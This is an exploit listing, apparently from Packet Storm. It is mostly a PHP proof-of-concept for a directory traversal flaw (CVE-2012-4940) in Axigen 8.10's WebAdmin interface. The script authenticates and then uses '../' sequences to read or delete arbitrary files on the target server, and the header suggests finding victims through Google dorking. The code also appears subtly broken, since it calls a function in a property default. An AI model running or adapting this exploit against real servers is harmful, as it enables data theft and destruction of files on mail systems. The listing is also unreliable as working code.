Exploit for Axigen 8.10 Directory Traversal CVE-2012-4940

## https://sploitus.com/exploit?id=PACKETSTORM:189628
=============================================================================================================================================
    | # Title     : Axigen 8.10 WebAdmin interface Directory Traversal Vulnerability                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.axigen.com/press/release-notes/axigen-810_83.html                                                               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Directory Traversal vulnerability in Axigen's WebAdmin interface.
    
        It can be used to test and exploit the mentioned vulnerability through Axigen WebAdmin web interface to read or delete any file on the target server if the login credentials are correct.
       
       (Related : https://packetstorm.news/files/id/180853/ Linked CVE numbers:	CVE-2012-4940 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 125
    
    [+] PayLoad :
    
    <?php
    
    class AxigenExploit
    {
        private $target;
        private $username;
        private $password;
        private $session;
        private $token;
        private $traversal = str_repeat('../', 10);
    
        public function __construct($target, $username, $password)
        {
            $this->target = rtrim($target, '/');
            $this->username = $username;
            $this->password = $password;
        }
    
        public function exploit($file, $action = 'read')
        {
            if (!$this->login()) {
                die("[-] فشل تسجيل الدخول، تحقق من بيانات الاعتماد.\n");
            }
    
            $filePath = $this->traversal . ltrim($file, '/');
    
            if ($action == 'read') {
                return $this->readFile($filePath);
            } elseif ($action == 'delete') {
                return $this->deleteFile($filePath);
            } else {
                die("[-] الإجراء غير معروف.\n");
            }
        }
    
        private function login()
        {
            echo "[*] محاولة تسجيل الدخول...\n";
    
            $data = http_build_query([
                'username' => $this->username,
                'password' => $this->password,
                'submit'   => 'Login',
                'action'   => 'login'
            ]);
    
            $response = $this->sendRequest('/', 'POST', $data);
    
            if ($response && preg_match('/_h=([a-f0-9]*)/', $response, $matches)) {
                $this->token = $matches[1];
    
                preg_match('/_hadmin=([a-f0-9]*)/', $response, $sessionMatch);
                $this->session = $sessionMatch[1] ?? null;
    
                echo "[+] تسجيل الدخول ناجح.\n";
                return true;
            }
    
            return false;
        }
    
        private function readFile($file)
        {
            echo "[*] محاولة قراءة الملف: $file...\n";
    
            $response = $this->sendRequest('/sources/logging/page_log_file_content.hsp', 'GET', null, [
                '_h'       => $this->token,
                'fileName' => $file
            ]);
    
            if ($response) {
                echo "[+] محتوى الملف:\n$response\n";
            } else {
                echo "[-] فشل استرجاع الملف.\n";
            }
        }
    
        private function deleteFile($file)
        {
            echo "[*] محاولة حذف الملف: $file...\n";
    
            $response = $this->sendRequest('/', 'GET', null, [
                '_h'       => $this->token,
                'page'     => 'vlf',
                'action'   => 'delete',
                'fileName' => $file
            ]);
    
            if ($response && strpos($response, 'View Log Files') !== false) {
                echo "[+] تم حذف الملف: $file\n";
            } else {
                echo "[-] فشل حذف الملف.\n";
            }
        }
    
        private function sendRequest($path, $method, $postData = null, $getParams = [])
        {
            $url = $this->target . $path;
            if (!empty($getParams)) {
                $url .= '?' . http_build_query($getParams);
            }
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    
            if ($method == 'POST') {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
            }
    
            if ($this->session) {
                curl_setopt($ch, CURLOPT_COOKIE, "_hadmin={$this->session}");
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
    
            return $response;
        }
    }
    
    // مثال على الاستخدام:
    $target = "http://192.168.1.100:9000"; // استبدل بعنوان الهدف
    $username = "admin";
    $password = "password";
    $filePath = "\\windows\\win.ini"; // استبدل بمسار الملف المطلوب
    
    $exploit = new AxigenExploit($target, $username, $password);
    $exploit->exploit($filePath, 'read'); // يمكن استخدام 'delete' لحذف الملف
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================